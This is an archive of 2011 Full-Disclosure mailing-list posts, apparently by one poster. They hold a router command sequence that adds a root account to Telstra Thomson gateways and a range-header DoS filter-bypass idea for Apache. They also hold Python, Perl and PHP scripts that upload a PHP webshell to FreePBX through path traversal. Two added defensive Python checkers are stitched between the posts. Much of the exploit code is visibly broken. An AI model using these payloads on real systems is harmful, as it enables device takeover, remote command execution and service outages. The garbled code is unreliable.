[Full-disclosure] Telstra thompson gateway - root exploit (0day)

2011-07-29 Thread xD 0x41
Telstra thompson gateway - root exploit

Telstra is an ISP here in Australia; it is also the same ISP which owns the
NBN

Author: Talon ( #haxnet member)


PoC script:

script add name addroot command user add name talon password talon role root
descr ROOT
script run name addroot pars
saveall


This would add a root user as talon:talon, with complete control over the
gateway and anything running from it.
On behalf of talon, before it gets raped by some idling non @.
cheers
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Telstra Thomson router - news item for CSO.com.au

2011-08-03 Thread xD 0x41
Hello to those who responded,
  My MAIN concern with this was the actual reporting of it, and since I
am actually a BP customer, it puts me in an awfully compromising position at
the moment, as I do not want to end up stuffed up for disclosing what
should have been done maybe a month ago.. albeit, the bug was only found the
day I did post it.
At the moment, it seems all the gateways on Bigpond are affected... and all
the models tested so far allow this, leading me to not even test any older
models.. It is a bug, it must be fixed... PLEASE read on... it is important.

I do not know how else to say this but, PLEASE, patch this up; it is not
really any good to people without some knowledge of at least how a router
forwards traffic and manages your internet.

For this reason, as I stated earlier in the PoC code.
I was genuinely worried about disclosing this, but I had to, because I'd
rather be on this side of the fence than sitting in the middle not knowing
HOW to go about reporting.
I have reported at least 10 bugs on various things, even one FreeBSD kernel
patch is through me; however, those are well structured security teams who
DON'T arrest the person who finds the bugs, rather they are rewarded for at
the last disclosure.

As you well know, this could be nasty in the right hands, but at the same
time, I would like to urge Telstra to take the lead and set up a REAL
security team/forum/rules-for-disclosure.
I urge CSO/Technicolor to help me do this.

The second you have this for me, I would be very happy in future to use
those protocols.

Please do not point the finger but rather, thank me and thank Talon, for
both of us, would never have been disclosed if not for it being discussed
first (in chatrooms etc. as you well know)... the day it was disclosed was
the day it was found. There is NO connection between my channel/chatroom and
any idiots who go around stealing.
You still have MUCH time to patch, please try to get this done.
Considering that the gateway will add a @bigpond.com to your host, well it
is a rather huge incentive for scammers to use legitimate systems to
compromise more.

*Technicolor is another huge company; again, I am glad the replies were
made regarding this, and I don't submit anything to
www.exploit-db.com rubbish sites.
*

I would be happy to work with Telstra anytime at NO fee just to secure my
own systems.

I hope I have cleared up a bit of why I went about things as I have... I do not
want to become another 'cecil', get my drift?
If I see PROPER protocols in place for people who disclose, I would use
them.
In the case of Technicolor, I am just glad they are now able to get
themselves patched, and again, would be happy to help.

FOR Telstra/Bigpond and Iprimus (yes, you're also affected I believe): when I
log in to my email @home base ISP, I do not see 'security' in the
page, clearly.
Not last I looked, and this is of course very much normal; it's time things
changed.

Maybe it is time that there are some hard-coded (manner of speech) rules and
protocol for this type of problem. Rather than sniffing routers and sneaking
around, you will only find the people who have 0 skills all sending you
emails hoping to score a winner... especially after what has happened with
cecil.
I hope there is a much more visible security section and ebook/pdf which
confirms things in 'paper'.

This is why Australia is still one of the biggest targets, and will remain
so, unless ISPs start to SPEAK with people, rather than arrest them.

In the case of cecil, I have NO pity, he was a NO skilled loser, and will
always be one. For those who are not though, I think almost every Telstra
user at the moment is probably too scared to even do anything online
regarding money or even perform some simple scanning/testing; this is thanks
to the press coverage of one idiotic kid/truckie or whatever he thinks he
was, and I see this just in 'chats', and worse, other countries are now
poking our systems.

*This is wrong.*

ISPs/companies here in AU MUST start to set up a visible, thorough line and
method for those who DO wish to assist; in my case and another's, we both
use Bigpond and I'd hate to be compromised through a gateway service.

I hope this comes loud and clear to ALL ISPs within Australia, and hopefully
we can get things up-to-date like many countries have done now, which has led
to MUCH better disclosure rates, and no arrests, because the skilled people
will shine through but those who are pathetic will not.
Hence you would not get anything bad from this; to set up an effective disclosure
policy is security, and should be treated as if it were on and offline, not
just online being some cesspit where people are only NOW starting to catch up
in AU, thanks to idiots who do not disclose things like this.
I can handle maybe a local kernel exploit, and sure, I'd even use to test my
systems; you do not see those guys going to jail etc... instead, they get
paid. This is why most of the world except AU is behind and has been since
1991 thx to a lie from t

Re: [Full-disclosure] Apache Killer

2011-09-13 Thread xD 0x41
I know this topic is OLD but, I just wonder and, also having spoken to kcope
re this myself, discussed the size of each bucket which can be made to
stupendous amounts and using a different vector, ok, instead of Range:bytes=
, picture a GET request with as was shown in the code is there, you
"Request-Range: bytes=5-,5-69,5-" , now we have bypassed most filters
already in place, and the request range code is exactly the same as range
code.
Only one person spotted this.

Anyhow, this started about byte= 'stupendous' amount but, in the end there
are a few ways that people are still using this..
Remember it does not need any mod_deflate or mod_gzip to function... I have
not tested the method outlined on anything new, but it was pretty nasty on
the old systems, which is now made worse if you set the byterange to a high
amount from start, rather than sending 0- first... you can just avoid it and
stay in the middle and lower it, but the problem can be repeated in some
packages, and I'm retesting using a simple bit of code called create_conns.c
and modified GET request.
create_conns code is googleable, just google for create_conns.c by n0ah and
you have found that app...  you can even try a slowloris app and just send
one packet. Simple enough to recreate this.. as this is not about 'range'
anymore.

Also I found this bypasses the filters set by mod_filter which were
'suggested' and actually added to part of the fix, or some fixes were based
on this.. I think that maybe a time to look at some modified code of this,
or just set up better traps, better yet, use a patched package, as I do not
*think* these are affected, but don't use any of the quick-fixes is what is
to be learnt from this exploit in a BIG way.
On FreeBSD the httpd on v8.0 was affected so badly, I have never seen a
httpd die so badly, as with a flavor of citrix which was interesting. Anyhow
moving on...

Anyhow, I know it is old but, I am seeing people still with this problem,
who don't realise that some quick-patches are NOT the way to go...
I would assume apache have seen that request-Range exists in the same LINE
as range code does, which is affected, so they would be a bit crazy to NOT
patch that.
I do remember one person showing the affected line in which request-range
was, and I looked it up in my code and bingo, it was the same as his example so
I assume request-range would be used in a request form.
A system GET or POST perhaps... anyhow regardless, I just thought of this
and the discussions I've had re this, and think it should be checked 1000% :P
Sorry for those who it annoys but, I'm a fussy fofo on that side of things,
i.e. httpd/ftpd MUST be spankin perfect or I don't rest.
Thanks for those who originally and still, help on this topic.
Always, thx to kcope for at least releasing it so it could be patched. <3
and of course, always my buddies on #haxnet@ef, who help me with these
discussions.
DoS sucks, but hiding from it sucks worse.
Cheers to all, and especially for those affected by 9/11, my special regards.
xd / dru
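
The point made in the message above, that a filter written for `Range` never looks at `Request-Range`, shown from the defender's side as an added Python example (not code from the thread or from Apache). The limit `MAX_RANGES` and the sample requests are assumptions constructed for the example; only the `Request-Range` value is the one quoted in the post.

```python
import re

# Both header names are inspected, because the post's point is that they feed
# the same byte-range handling while filters often name only "Range".
RANGE_HEADERS = ("range", "request-range")
MAX_RANGES = 5  # assumed policy limit for this example, not a value from the post
SPEC = re.compile(r"^\s*([0-9]*)\s*-\s*([0-9]*)\s*$")


def parse_head(raw):
    """Return (lowercased name, value) pairs from a raw request head."""
    headers = []
    for line in raw.split("\r\n")[1:]:      # skip the request line
        if line == "":
            break                           # end of the header block
        if line[0] in " \t" and headers:    # folded continuation of the previous header
            name, value = headers[-1]
            headers[-1] = (name, value + " " + line.strip())
            continue
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip().lower(), value.strip()))
    return headers


def byte_ranges(value):
    """Parse 'bytes=0-499,500-' into [(start, end)]; None marks an open side.
    Returns None when the value is not a well-formed bytes range set."""
    unit, sep, specs = value.partition("=")
    if not sep or unit.strip().lower() != "bytes":
        return None
    ranges = []
    for spec in specs.split(","):
        m = SPEC.match(spec)
        if not m or (m.group(1) == "" and m.group(2) == ""):
            return None
        start = int(m.group(1)) if m.group(1) else None
        end = int(m.group(2)) if m.group(2) else None
        ranges.append((start, end))
    return ranges


def has_overlap(ranges):
    """True when two ranges cover the same byte; an open end counts as infinity."""
    spans = sorted((s, float("inf") if e is None else e)
                   for s, e in ranges if s is not None)
    reach = -1
    for start, end in spans:
        if start <= reach:
            return True
        reach = max(reach, end)
    return False


def check_request(raw, headers_checked=RANGE_HEADERS):
    """Return a list of (header, reason) findings for one raw request."""
    findings = []
    for name, value in parse_head(raw):
        if name not in headers_checked:
            continue
        ranges = byte_ranges(value)
        if ranges is None:
            findings.append((name, "malformed"))
        elif len(ranges) > MAX_RANGES:
            findings.append((name, "too-many-ranges"))
        elif has_overlap(ranges):
            findings.append((name, "overlapping-ranges"))
    return findings


# Constructed sample requests (host name is a placeholder).
LEGACY_HEADER_REQUEST = (
    "GET / HTTP/1.1\r\nHost: www.example.test\r\n"
    "Request-Range: bytes=5-,5-69,5-\r\n\r\n"
)
ORDINARY_REQUEST = (
    "GET /file.bin HTTP/1.1\r\nHost: www.example.test\r\n"
    "Range: bytes=0-499\r\n\r\n"
)
MANY_RANGES_REQUEST = (
    "GET /file.bin HTTP/1.1\r\nHost: www.example.test\r\n"
    "Range: bytes=0-1,2-3,4-5,6-7,8-9,10-11\r\n\r\n"
)

if __name__ == "__main__":
    for label, req in (("legacy", LEGACY_HEADER_REQUEST),
                       ("ordinary", ORDINARY_REQUEST),
                       ("many", MANY_RANGES_REQUEST)):
        print(label, "range-only filter:", check_request(req, ("range",)),
              "both headers:", check_request(req))
```

Where no client needs the legacy header, removing it before range processing (for Apache httpd, `RequestHeader unset Request-Range` with mod_headers) closes the second path instead of filtering it.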

[Full-disclosure] FreePBX Unfounded RCE PoC or rather Misguided PoC maybe ?

2011-09-17 Thread xD 0x41
Just like to point out this is total rubbish, along with the other FreePBX
vuln which was listed and which I stupidly wasted time writing a PoC for
(which only works if admin is enabled).
I DID make this in 3 languages, and had it tested; it ONLY ran under admin
conditions... what's so useful then??
I have got the PoCs I made, and I copied the header to a T; it is NOT one
bit different to the example header BUT I ADDED CODE to send it
properly.. and to open any 'webshell'.
OK, let's break it down:


Trustwave's SpiderLabs Security Advisory TWSL2010-005:
FreePBX recordings interface allows remote code execution
^^^here we have code execution (does not say it requires ADMIN todo this and
someone basically at a console, pressing a button for you :P)

https://www.trustwave.com/spiderlabs/advisories/TWSL2010-005.txt

Published: 2010-09-23
Version: 1.0

Vendor: FreePBX (http://www.freepbx.org/)
Product: FreePBX and VOIP solutions (AsteriskNOW, TrixBox, etc) using it
Version(s) affected: 2.8.0 and below

Product Description:
FreePBX is an easy to use GUI (graphical user interface) that controls and
manages Asterisk, the world's most popular open source telephony engine
software. FreePBX has been developed and hardened by thousands of
volunteers,
has been downloaded over 5,000,000 times, and is utilized in an estimated
500,000 active phone systems.

Source: http://www.freepbx.org
Credit: Wendel G. Henrique of Trustwave's SpiderLabs

CVE: CVE-2010-3490

Finding:
The configuration interface for FreePBX is prone to a remote arbitrary code
execution on the system recordings menu. FreePBX doesn't handle file uploads
in a secure manner, allowing an attacker to manipulate the file extension
and the beginning of the uploaded file name.

The piece of code below, found in page.recordings.php, illustrates part of
the recordings upload feature.
 page.recordings.php not accessible or non existent.

/* Code removed to fit better on advisory */
"._("Successfully uploaded")."
  ".$_FILES['ivrfile']['name']."";
$rname = rtrim(basename($_FILES['ivrfile']['name'], $suffix), '.');
  } ?>

/* Code removed to fit better on advisory */

When a file is uploaded, a copy is saved temporarily under the /tmp/
directory, where the name of the file is composed of
user-controlled-staticname.extension, where:

"user-controlled" is $usersnum variable.
"staticname" value is -ivrrecording.
"extension" is controlled by the user.

If $usersnum variable is not defined, then a static string (unnumbered)
is used.

Finally, when the user clicks on the save button on the System Recordings
/// o ok so someone MUST 'save' it, in PHYSICAL form; this bit was what
I overlooked in this first adv wth!!!
interface, the file is saved with the original file name provided by the
user under the /var/lib/asterisk/sounds/custom/
directory. /// and bang, sorry but unable to see
this file once yet... a bit useful eh ?> guess ppl don't press 'save' to an
unknown, nothing-on-it recording.


When uploading a file, an attacker can manipulate the $usersnum variable to
perform a path traversal attack and save it anyplace that the web
server  /// ok this, I don't really care for, but it is a bit useless when
the remote code is really the feature of this
user has access, for example the Apache's DocumentRoot. This allows an
attacker to upload malicious code to the web server and execute it under the
webserver's access permissions.

The HTTP request below illustrates the upload of a phpshell.

POST /admin/config.php HTTP/1.1
Host: 10.10.1.3
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;
en-US; rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://10.10.1.3/admin/config.php
Cookie: ARI=cookieValue; PHPSESSID=cookieValue
Authorization: Basic base64auth
Content-Type: multipart/form-data;
boundary=---5991806838789183981588991120
Content-Length: 116089

-5991806838789183981588991120
Content-Disposition: form-data; name="display"

recordings
-5991806838789183981588991120
Content-Disposition: form-data; name="action"

recordings_start
-5991806838789183981588991120
Content-Disposition: form-data; name="usersnum"

../../../../../var/www/html/admin/SpiderLabs
-5991806838789183981588991120
Content-Disposition: form-data; name="ivrfile"; filename="webshell.php"
Content-Type: application/octet-stream



-5991806838789183981588991120--
/// good luck trying to find this and note, now we have to access a file at
where??? lets see

To access the webshell in this example, an attacker would use
the following path: http://10.10.1.3/admin/SpiderLabs-ivrrecord

Re: [Full-disclosure] FreePBX Unfounded RCE PoC or rather Misguided PoC maybe ?

2011-09-18 Thread xD 0x41
print $sock $buffer;
while ($answer=<$sock>) {
if ($answer=~/defaultStatus="(.*)";/g) {
print $1."\n";
}
if ($answer=~/>/g) {
$cmd_chk=1;
}
if ($cmd_chk==1) {
if ($answer=~/<\/pre><\/td><\/tr>/g){
exit;
} else {
print $answer;
print results "[+] $answer\n";
}
}
}
}

although, my perl is pathetic :P so I don't know if that's right
then I tried in php, and it seems to replicate perfectly... and again, no
file-ivrrecordings.php appearing :s

http://101.11.1.11/\r\n";;
$part1 .=   "Cookie: ARI=cookieValue; PHPSESSID=cookieValue\r\n";
$part1 .=   "Authorization: Basic base64auth\r\n";
$part2 .=   "Content-Type : multipart/form-data;\r\n";
$part2  =
"boundary=-5991806838789183981588991120--\r\n";
$part2 .=   "Content-Type : multipart/form-data;\r\n";
$part2  =
"boundary=-5991806838789183981588991120--\r\n";
$part2  =   "Content-Length: 116089\r\n";
$part2 .=   "\r\n";
$part2 .=
"-5991806838789183981588991120\r\n";
$part2 .=   "Content-Disposition: form-data; name=\"display\"\r\n";
$part2 .=   "\r\n";
$part2 .=   "recordings\r\n";
$part2 .=
"---5991806838789183981588991120\r\n";
$part2 .=   "Content-Disposition: form-data; name=\"action\"\r\n";
$part2 .=   "\r\n";
$part2 .=   "recordings_start\r\n";
$part2 .=
"---5991806838789183981588991120\r\n";
$part2 .=   "Content-Disposition: form-data; name=\"usersnum\"\r\n";
$part2 .=   "\r\n";
$part2 .=   "Content-Disposition: form-data;
name=\"../../../../../var/www/html/xd/\"\r\n";
$part2 .=
"---5991806838789183981588991120\r\n";
$part2 .=   "Content-Disposition: form-data; name=\"ivrfile\";
filename=\"shell.php\"\r\n";
$part2 .=   "Content-Type: application/octet-stream\r\n";
$part2 .=   "\r\n";
$part2 .=   "\' + system(\'$code\') + \'\';
?>\r\n";
$part2 .=
"-5991806838789183981588991120--\r\n";
$part1 .=   $part2;
fwrite($socket, $part1);
echo "[!] Check the upload folder (/var/www/html/xd)  ..";
} else {
echo "\n\n";
echo
"+---+\r\n";
echo "|Usage: php exploit.php site.com   |\r\n";
echo
"+---+\r\n";
echo "\n\n";
}
?>
In the php one I tried using a different folder... what is it , the server
is NOT patched.

I may have missed something, but I was able to replicate the EXACT header
shown in the spiderlabs, and on this system, nothing showed. It is hand
patched, so I'm beginning to wonder if somehow the owner has fluked this one
:? (that'd be great really), but there is a bug still, if not this one, then
another one which is allowing problems for me.
I will have to read as there seem to be a few more emails on this; thank you
for your input, I will have to test again or look at the code and make sure
it is right.. I hurried this but the python exploit code was already made
for this PoC, I was given that.
This box is just VoIP of headaches.
Thanks for your assistance, and thank you for those xss bugs, I may have to
test for those also, although the problem seems more serious than that.
xd
www.crazycoders.com / #haxnet@Ef





On 18 September 2011 03:58, Grandma Eubanks  wrote:

> So, I found several FreePBX vulnerabilities about a week before SpiderLabs
> came out with this new PoC (which I can't believe I missed).
> http://seclists.org/fulldisclosure/2010/Jul/180
> Now, you can use my LFI and transport particular files to a TFTP accessible
> path, assuming TFTP is enabled on that server (which it seems to be in most
> of the cases).
>
> As for the vulnerability you're using...how exact are you being? Take a
> look at the code:
> $dest = "{$usersnum}-";
> $destfilename = $recordings_save_path.$dest."ivrrecording.".$suffix;
> move_uploaded_file($_FILES['ivrfile']['tmp_name'], $destfilename);
>
> Alright, so the usernumber is a user definable value and there was no check
> to make sure this was an actual integer. So the problem here is you're
> allowed to specify a path to upload a file to. Now, let's take a look at
> what you put for your path:
>
> Content-Disposition: for
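
The missing check described in the quoted reply above (no test that `usersnum` is an integer) and in the advisory's note that the extension is user-controlled, as an added Python model of that PHP path construction; it is not FreePBX code and not from the thread. `SAVE_DIR` and the extension allowlist are assumed values, and the traversal string is the one printed in the advisory's request.

```python
import os
import re

SAVE_DIR = "/tmp/"                          # assumed stand-in for $recordings_save_path
ALLOWED_SUFFIXES = {"wav", "gsm", "mp3"}    # assumed allowlist of audio extensions
TRAVERSAL_FROM_ADVISORY = "../../../../../var/www/html/admin/SpiderLabs"


def dest_unchecked(usersnum, suffix):
    """Same concatenation as the quoted PHP: both fields are used as received."""
    dest = "{}-".format(usersnum)
    return SAVE_DIR + dest + "ivrrecording." + suffix


def landing_path(path):
    """Where a path really points once '..' components are collapsed."""
    return os.path.normpath(path)


def escapes_save_dir(path):
    """True when the collapsed path is no longer under SAVE_DIR."""
    base = os.path.normpath(SAVE_DIR)
    return os.path.commonpath([base, landing_path(path)]) != base


def dest_checked(usersnum, suffix):
    """Build the same file name, but accept only <digits>-ivrrecording.<audio ext>."""
    if usersnum == "":
        # The advisory says a static string is used when the variable is not set.
        usersnum = "unnumbered"
    elif not re.fullmatch(r"[0-9]{1,20}", usersnum):
        raise ValueError("usersnum must be an integer")
    suffix = suffix.lower()
    if suffix not in ALLOWED_SUFFIXES:
        raise ValueError("extension not allowed")
    base = os.path.realpath(SAVE_DIR)
    name = "{}-ivrrecording.{}".format(usersnum, suffix)
    path = os.path.realpath(os.path.join(base, name))
    # Second line of defence: the validated name must still resolve inside
    # the save directory (this also catches a symlink planted at that name).
    if os.path.commonpath([base, path]) != base:
        raise ValueError("destination escapes the save directory")
    return path


def is_rejected(usersnum, suffix):
    """Convenience wrapper: True when dest_checked refuses the input."""
    try:
        dest_checked(usersnum, suffix)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    raw = dest_unchecked(TRAVERSAL_FROM_ADVISORY, "php")
    print("unchecked :", raw)
    print("lands at  :", landing_path(raw), "(escapes:", escapes_save_dir(raw), ")")
    print("checked   :", dest_checked("1001", "wav"))
    print("traversal rejected:", is_rejected(TRAVERSAL_FROM_ADVISORY, "wav"))
    print(".php rejected     :", is_rejected("1001", "php"))
```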

[Full-disclosure] Fwd: FreePBX Unfounded RCE PoC or rather Misguided PoC maybe ?

2011-09-18 Thread xD 0x41

Re: [Full-disclosure] FreePBX Unfounded RCE PoC or rather Misguided PoC maybe ?

2011-09-19 Thread xD 0x41
Hello,
Yes I noticed this last night, and have not yet recoded a PoC using the full
path, but to make one using your xss, I might have to modify a bit
more... hmm, I'm only testing one box which was busted/broken up by a 'break-in',
that's why I am trying to figure out how... but yes, there are more bugs than
just this. I will relook at the tested PoC with your comments and actually,
I should have picked that up from the broken PoC; I actually did, wonder why
the Trustwave/SpiderLabs vulns showed one path yet posted to another... then
I saw another apparent RFI, and this apparently needed 'admin'
credentials... so I thought this was possibly also the case with the... rather
broken SpiderLabs PoC... as I thought it was... however, thank you, I am not so
confident with php and the whole RFI thing, so I am basically trying to fix
and patch a broken box... at least I have enough code snippets to fix some
problems... one of those PoCs was not written by me so there are
definitely 'in the wild' exploits for this... no doubt. I just want to patch
this one box and gtfo of dodge.
Anyhow cheers, I'll redo the PoC and test again..
regards,
xd


On 19 September 2011 03:28, Grandma Eubanks  wrote:

> Well, my disclosures involved one boring xss bug and several other more
> interesting ones like grabbing the config file.  I wouldn't have disclosed if
> it was just reflected xss.
>
> Anyway, I still don't understand what you're trying to do. You're not even
> posting to the correct page that has the form you're trying to exploit.
> You're still stuck on their PoC and not the vulnerability information. Yes,
> their PoC is seemingly wrong.
>
> POST /admin/config.php
>
> But, vulnerability lies in /recordings/page.recordings.php
>
> Also, use my full path disclosure problem to see if it's even installed in
> the default directory of /var/www/.
>
> On Sat, Sep 17, 2011 at 3:51 PM, xD 0x41  wrote:
>
>> Hello,
>> Thank you for your input regarding this; the issue is not a matter of
>> where to put files, nor of LFI, it is more of 'why is this PoC made for
>> non-user accounts, and can it be used remotely by attackers'.
>>
>> I have written 3 or so PoCs for this and also for another bug in this,
>> they can be found here:
>> #!/usr/bin/env python
>> import urllib, re, os, httplib, urllib2, time, socket, getopt, sys
>>
>> host = $host
>> port = 80
>>
>> s = socket.socket('socket.AF_INET,socket.SOCK_STREAM\r\n')
>> ##s.connectHTTPS((host,port))
>> s.connectHTTP((host,port))
>> s.send(
>> 'POST /admin/config.php HTTP/1.1\r\n'
>> 'Host: ' + host + '\r\n'
>> 'User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;en-US;
>> rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7\r\n'
>> 'Accept:
>> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n'
>> 'Accept-Language: en-us,en;q=0.5\r\n'
>> 'Accept-Encoding: gzip,deflate\r\n'
>> 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n'
>> 'Keep-Alive: 300\r\n'
>> 'Proxy-Connection: keep-alive\r\n'
>> 'Referer: http://' + host + '/admin/config.php\r\n'
>> 'Cookie: ARI=cookieValue; PHPSESSID=cookieValue\r\n'
>> 'Authorization: Basic base64auth\r\n')
>> 'Content-Type: multipart/form-data;\r\n'
>> 'boundary=---5991806838789183981588991120\r\n'
>> 'Content-Type: multipart/form-data;\r\n'
>> 'boundary=---5991806838789183981588991120\r\n'
>> 'Content-Length: 116089\r\n'
>> '\r\n'
>> '-5991806838789183981588991120\r\n'
>> 'Content-Disposition: form-data; name="display"\r\n'
>> '\r\n'
>> 'recordings\r\n'
>> '-5991806838789183981588991120\r\n'
>> 'Content-Disposition: form-data; name="action"\r\n'
>> '\r\n'
>> 'recordings_start\r\n'
>> '-5991806838789183981588991120\r\n'
>> 'Content-Disposition: form-data; name="usersnum"\r\n'
>> '\r\n'
>> '../../../../../var/www/html/admin/zmeu.php\r\n'
>> '-5991806838789183981588991120\r\n'
>> 'Content-Disposition: form-data; name="ivrfile";
>> filename="webshell.php"\r\n'
>> 'Content-Type: application/octet-stream\r\n'
>> '\r\n'
>> '\'

Re: [Full-disclosure] FreePBX Unfounded RCE PoC or rather Misguided PoC maybe ?

2011-09-19 Thread xD 0x41
hmmm I am looking at your actual advisory, I downloaded it and am reading
it. I am not too good with the old php, and I am a bit confused on how to
find if the install is default; although I can see an example, I don't know
if this would need to be regex'd or not.. or if I have to use script() type
xss to recover it, from one of the other xss you showed... I will try though,
that's rather disturbing, the persistent xss you showed, kinda nasty if used
right... very nice adv btw. I needed that.
cheers,
xd


On 19 September 2011 03:28, Grandma Eubanks  wrote:

> Well, my disclosures involved one boring xss bug and several other more
> interesting ones like grabbing the config file.  I wouldn't have disclosed if
> it was just reflected xss.
>
> Anyway, I still don't understand what you're trying to do. You're not even
> posting to the correct page that has the form you're trying to exploit.
> You're still stuck on their PoC and not the vulnerability information. Yes,
> their PoC is seemingly wrong.
>
> POST /admin/config.php
>
> But, vulnerability lies in /recordings/page.recordings.php
>
> Also, use my full path disclosure problem to see if it's even installed in
> the default directory of /var/www/.
>
> On Sat, Sep 17, 2011 at 3:51 PM, xD 0x41  wrote:
>
>> Hello,
>> Thank you for your input regarding this; the issue is not a matter of
>> where to put files, nor of LFI, it is more of 'why is this PoC made for
>> non-user accounts, and can it be used remotely by attackers'.
>>
>> I have written 3 or so PoCs for this and also for another bug in this,
>> they can be found here:
>> #!/usr/bin/env python
>> import urllib, re, os, httplib, urllib2, time, socket, getopt, sys
>>
>> host = $host
>> port = 80
>>
>> s = socket.socket('socket.AF_INET,socket.SOCK_STREAM\r\n')
>> ##s.connectHTTPS((host,port))
>> s.connectHTTP((host,port))
>> s.send(
>> 'POST /admin/config.php HTTP/1.1\r\n'
>> 'Host: ' + host + '\r\n'
>> 'User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;en-US;
>> rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7\r\n'
>> 'Accept:
>> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n'
>> 'Accept-Language: en-us,en;q=0.5\r\n'
>> 'Accept-Encoding: gzip,deflate\r\n'
>> 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n'
>> 'Keep-Alive: 300\r\n'
>> 'Proxy-Connection: keep-alive\r\n'
>> 'Referer: http://' + host + '/admin/config.php\r\n'
>> 'Cookie: ARI=cookieValue; PHPSESSID=cookieValue\r\n'
>> 'Authorization: Basic base64auth\r\n')
>> 'Content-Type: multipart/form-data;\r\n'
>> 'boundary=---5991806838789183981588991120\r\n'
>> 'Content-Type: multipart/form-data;\r\n'
>> 'boundary=---5991806838789183981588991120\r\n'
>> 'Content-Length: 116089\r\n'
>> '\r\n'
>> '-5991806838789183981588991120\r\n'
>> 'Content-Disposition: form-data; name="display"\r\n'
>> '\r\n'
>> 'recordings\r\n'
>> '-5991806838789183981588991120\r\n'
>> 'Content-Disposition: form-data; name="action"\r\n'
>> '\r\n'
>> 'recordings_start\r\n'
>> '-5991806838789183981588991120\r\n'
>> 'Content-Disposition: form-data; name="usersnum"\r\n'
>> '\r\n'
>> '../../../../../var/www/html/admin/zmeu.php\r\n'
>> '-5991806838789183981588991120\r\n'
>> 'Content-Disposition: form-data; name="ivrfile";
>> filename="webshell.php"\r\n'
>> 'Content-Type: application/octet-stream\r\n'
>> '\r\n'
>> '\' + system($_GET[\'CMD\']) + \'\'; ?>\r\n'
>> '-5991806838789183981588991120--\r\n'
>>
>>
>> Then I found it did not work, and I KNOW there is a bug affecting things
>> for this area of boxes... I cannot say a lot more about that but I will only
>> say, there are bugs still affecting this, and I'm trying to secure one box
>> only for a client... so what credentials do I need?
>> Anyhow, there is also one which I tried in perl which I have now made
>> connect to both ports 80/443 and try; this seems to be pretty accurate... yet
>> a

Re: [Full-disclosure] Fwd: FreePBX Unfounded RCE PoC or rather Misguided PoC maybe ?

2011-09-19 Thread xD 0x41
OK well, after trying again with the php code, but corrected php code, I
still was not able to reproduce the bug... don't think you're right about it,
maybe right about the PoC being wrong, and it sure looks like there should be
problems, but there don't seem to be... I might try coding it in perl.. but I
don't think it is possible to save a page.. maybe execute a command, but I
don't think you can execute the command afterwards, i.e., saved shell.php with
nothing in it but 

I will try to fix it..
but I think there is still more around which is not being shown, and the code
probably needs a good audit.
xd



On 19 September 2011 03:28, Grandma Eubanks  wrote:

> Well, my disclosures involved one boring xss bug and several other more
> interesting ones like grabbing the config file.  I wouldn't have disclosed if
> it was just reflected xss.
>
> Anyway, I still don't understand what you're trying to do. You're not even
> posting to the correct page that has the form you're trying to exploit.
> You're still stuck on their PoC and not the vulnerability information. Yes,
> their PoC is seemingly wrong.
>
> POST /admin/config.php
>
> But, vulnerability lies in /recordings/page.recordings.php
>
> Also, use my full path disclosure problem to see if it's even installed in
> the default directory of /var/www/.
>
>
> On Sat, Sep 17, 2011 at 3:58 PM, xD 0x41  wrote:
>
>> Hello,
>> Thank you for your input regarding this; the issue is not a matter of
>> where to put files, nor of LFI, it is more of 'why is this PoC made for
>> non-user accounts, and can it be used remotely by attackers'.
>>
>> I have written 3 or so PoCs for this and also for another bug in this,
>> they can be found here:
>> #!/usr/bin/env python
>> import urllib, re, os, httplib, urllib2, time, socket, getopt, sys
>>
>> host = $host
>> port = 80
>>
>> s = socket.socket('socket.AF_INET,socket.SOCK_STREAM\r\n')
>> ##s.connectHTTPS((host,port))
>> s.connectHTTP((host,port))
>> s.send(
>> 'POST /admin/config.php HTTP/1.1\r\n'
>> 'Host: ' + host + '\r\n'
>> 'User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;en-US;
>> rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7\r\n'
>> 'Accept:
>> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n'
>> 'Accept-Language: en-us,en;q=0.5\r\n'
>> 'Accept-Encoding: gzip,deflate\r\n'
>> 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n'
>> 'Keep-Alive: 300\r\n'
>> 'Proxy-Connection: keep-alive\r\n'
>> 'Referer: http://' + host + '/admin/config.php\r\n'
>> 'Cookie: ARI=cookieValue; PHPSESSID=cookieValue\r\n'
>> 'Authorization: Basic base64auth\r\n')
>> 'Content-Type: multipart/form-data;\r\n'
>> 'boundary=---5991806838789183981588991120\r\n'
>> 'Content-Type: multipart/form-data;\r\n'
>> 'boundary=---5991806838789183981588991120\r\n'
>> 'Content-Length: 116089\r\n'
>> '\r\n'
>> '-5991806838789183981588991120\r\n'
>> 'Content-Disposition: form-data; name="display"\r\n'
>> '\r\n'
>> 'recordings\r\n'
>> '-5991806838789183981588991120\r\n'
>> 'Content-Disposition: form-data; name="action"\r\n'
>> '\r\n'
>> 'recordings_start\r\n'
>> '-5991806838789183981588991120\r\n'
>> 'Content-Disposition: form-data; name="usersnum"\r\n'
>> '\r\n'
>> '../../../../../var/www/html/admin/zmeu.php\r\n'
>> '-5991806838789183981588991120\r\n'
>> 'Content-Disposition: form-data; name="ivrfile";
>> filename="webshell.php"\r\n'
>> 'Content-Type: application/octet-stream\r\n'
>> '\r\n'
